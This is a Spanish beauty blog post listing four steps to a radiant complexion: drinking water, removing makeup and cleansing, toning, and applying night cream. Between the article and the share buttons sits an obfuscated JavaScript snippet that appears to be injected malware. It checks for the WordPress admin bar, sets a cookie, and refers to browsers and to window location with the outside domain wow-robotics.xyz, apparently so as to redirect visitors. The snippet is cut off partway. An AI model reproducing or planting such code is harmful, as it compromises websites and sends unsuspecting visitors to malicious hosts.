Los pasos que debes seguir para obtener un cutis radiantes son los siguienetes:

1. Hidrata

Procura beber abundante agua todo el día. Lo ideal es beber una media de 2 litros diarios.

2. Limpia y desmaquilla

Utiliza un desmaquillante apropiado para eliminar los restos de maquillaje  y los restos de grasa en tu piel. Lo mejor es que utilices uno bifásico y que se adapte a los maquillajes de larga duración, para limpiar a fondo tu rostro.

A continuación, utiliza un gel o leche limpiadora. Lo más recomendable es usar jabones neutros, evitando sustancias químicas que cambien el PH de nuestra piel.

3. Tonifica

Cuando ya hayas limpiado tu rostro, tonifícalo. ¿Cuál es la utilidad del tónico? Gracias a este producto, podrás estabilizar el exceso de sebo, cerrar tus poros y refrescar tu piel. ¡Verás que sensación de confort obtienes!

4. Aplica una crema de noche

Por último, no te olvides de aplicar tu crema nutritiva de noche antes de dormir. Utiliza la crema que mejor se adapte a tus necesidades…primeras arruguitas, sequedad, firmeza…

¡Es importantísimo cuidar la piel también por la noche! 😉

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone